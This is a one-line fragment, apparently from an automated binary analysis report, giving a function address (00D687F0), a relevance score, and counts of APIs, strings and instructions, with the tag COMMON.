Function 00D687F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON